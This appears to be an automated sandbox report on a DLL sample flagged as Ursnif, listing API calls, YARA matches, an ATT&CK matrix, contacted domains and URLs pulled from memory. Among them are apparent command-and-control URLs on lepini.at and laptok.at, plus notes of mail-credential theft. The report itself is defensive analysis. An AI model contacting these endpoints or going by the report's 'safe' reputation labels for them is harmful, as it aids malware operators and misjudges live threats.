          Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000024.00000000.411588453.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0277A12A cpuid
          Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_05405F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_027712E8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0277A12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_0277A667 GetVersionExA,wsprintfA,
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected Ursnif
          Source: Yara match | File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY
          Tries to steal Mail credentials (via file access)
          Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality:

          Yara detected Ursnif
          Source: Yara match | File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

          Mitre Att&ck Matrix

          (Trailing digits on a technique name are the report's signature-count badges.)

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts 1 | Windows Management Instrumentation 2 | DLL Side-Loading 1 | DLL Side-Loading 1 | Obfuscated Files or Information 2 | Credential API Hooking 3 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Native API 1 | Valid Accounts 1 | Valid Accounts 1 | Software Packing 2 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Email Collection 11 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Command and Scripting Interpreter 12 | Logon Script (Windows) | Access Token Manipulation 1 | DLL Side-Loading 1 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Credential API Hooking 3 | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | PowerShell 1 | Logon Script (Mac) | Process Injection 713 | Rootkit 4 | NTDS | System Information Discovery 35 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 5 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Valid Accounts 1 | Cached Domain Credentials | Security Software Discovery 11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Virtualization/Sandbox Evasion 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 3 | Proc Filesystem | Process Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 713 | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Regsvr32 1 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
          Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Rundll32 1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

          Behavior Graph

          [Behavior graph image: Behavior Graph ID 353243, Sample NJPcHPuRcG.dll, Startdate 15/02/2021, Architecture WINDOWS, Score 100; the graph's node and legend text is not reproduced here]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          NJPcHPuRcG.dll | 16% | Virustotal |  | Browse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label | Link | Download
          2.3.regsvr32.exe.4c3e4a0.2.unpack | 100% | Avira | HEUR/AGEN.1132033 |  | Download File
          2.2.regsvr32.exe.2770000.1.unpack | 100% | Avira | HEUR/AGEN.1108168 |  | Download File
          2.3.regsvr32.exe.4eb94a0.1.unpack | 100% | Avira | HEUR/AGEN.1132033 |  | Download File

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label | Link
          http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe |
          http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe |
          http://www.dailymail.co.uk/ | 0% | URL Reputation | safe |
          http://constitution.org/usdeclar.txtC: | 0% | Avira URL Cloud | safe |
          http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe |
          http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 | 0% | Avira URL Cloud | safe |
          http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w | 0% | Avira URL Cloud | safe |
          http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          http://%s.com | 0% | URL Reputation | safe |
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
          http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe |
          http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe |
          http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm | 0% | Avira URL Cloud | safe |
          http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe |
          http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
          http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe |
          http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe |
          http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe |
          https://contoso.com/Icon | 0% | URL Reputation | safe |
          http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe |
          http://buscar.ozu.es/ | 0% | Avira URL Cloud | safe |
          http://busca.igbusca.com.br/ | 0% | URL Reputation | safe |
          http://www.carterandcone.coml | 0% | URL Reputation | safe |
          http://search.auction.co.kr/ | 0% | URL Reputation | safe |
          http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe |
          http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe |
          http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe |
          http://google.pchome.com.tw/ | 0% | URL Reputation | safe |
          http://www.ozu.es/favicon.ico | 0% | Avira URL Cloud | safe |
          http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe |
          http://www.gmarket.co.kr/ | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
          http://searchresults.news.com.au/ | 0% | URL Reputation | safe |
          http://www.asharqalawsat.com/ | 0% | URL Reputation | safe |
          http://search.yahoo.co.jp | 0% | URL Reputation | safe |
          http://buscador.terra.es/ | 0% | URL Reputation | safe |
          http://www.typography.netD | 0% | URL Reputation | safe |
          http://fontfabrik.com | 0% | URL Reputation | safe |

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          contextual.media.net | 23.210.250.97 | true | false |  | high
          tls13.taboola.map.fastly.net | 151.101.1.44 | true | false |  | unknown
          hblg.media.net | 23.210.250.97 | true | false |  | high
          c56.lepini.at | 34.65.144.159 | true | false |  | unknown
          lg3.media.net | 23.210.250.97 | true | false |  | high
          resolver1.opendns.com | 208.67.222.222 | true | false |  | high
          api3.lepini.at | 34.65.144.159 | true | false |  | unknown
          geolocation.onetrust.com | 104.20.184.68 | true | false |  | high
          api10.laptok.at | 34.65.144.159 | true | false |  | unknown
          www.msn.com | unknown | unknown | false |  | high
          srtb.msn.com | unknown | unknown | false |  | high
          img.img-taboola.com | unknown | unknown | true |  | unknown
          web.vortex.data.msn.com | unknown | unknown | false |  | high
          cvision.media.net | unknown | unknown | false |  | high

                                      Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 | false | Avira URL Cloud: safe | unknown

                                      URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://search.chol.com/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.mercadolivre.com.br/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://search.ebay.de/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.mtv.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.rambler.ru/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.nifty.com/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.dailymail.co.uk/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www3.fnac.com/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://buscar.ya.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://search.yahoo.com/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://constitution.org/usdeclar.txtC: | regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://https://file://USER.ID%lu.exe/upd | regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
          http://www.sogou.com/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.fontbureau.com/designers | explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp | false |  | high
          http://asp.usatoday.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://fr.search.yahoo.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w | explorer.exe, 00000024.00000002.622432567.00000000053A0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://rover.ebay.com | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://in.search.yahoo.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://search.ebay.in/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          https://nuget.org/nuget.exe | powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp | false |  | high
          http://www.galapagosdesign.com/DPlease | explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://%s.com | explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp | false | URL Reputation: safe | low
          http://msk.afisha.ru/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.zhongyicts.com.cn | explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000019.00000002.447413776.000001BFD2931000.00000004.00000001.sdmp | false |  | high
          http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://search.rediff.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.ya.com/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.etmall.com.tw/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm | explorer.exe, 00000024.00000000.435365866.000000000DC20000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://it.search.dada.net/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://pesterbdd.com/images/Pester.png | powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://search.naver.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.google.ru/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://search.hanafos.com/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp | false |  | high
          http://cgi.search.biglobe.ne.jp/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.abril.com.br/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://search.daum.net/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          https://contoso.com/Icon | powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://search.naver.com/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://search.msn.co.jp/results.aspx?q= | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.clarin.com/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://buscar.ozu.es/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://kr.search.yahoo.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://search.about.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://busca.igbusca.com.br/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.ask.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.priceminister.com/favicon.ico | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          https://github.com/Pester/Pester | powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp | false |  | high
          http://www.cjmall.com/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://search.centrum.cz/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.carterandcone.coml | explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://suche.t-online.de/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://www.google.it/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
          http://search.auction.co.kr/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.ceneo.pl/ | explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | false |  | high
                                                                                                                  http://www.amazon.de/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://sads.myspace.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://google.pchome.com.tw/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.rambler.ru/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://uk.search.yahoo.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://espanol.search.yahoo.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.ozu.es/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://search.sify.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://openimage.interpark.com/interpark.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.ebay.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.gmarket.co.kr/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://search.nifty.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://searchresults.news.com.au/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.google.si/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.google.cz/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.soso.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.univision.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.ebay.it/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.asharqalawsat.com/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://busca.orange.es/explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpfalse
                                                                                                                                                    high
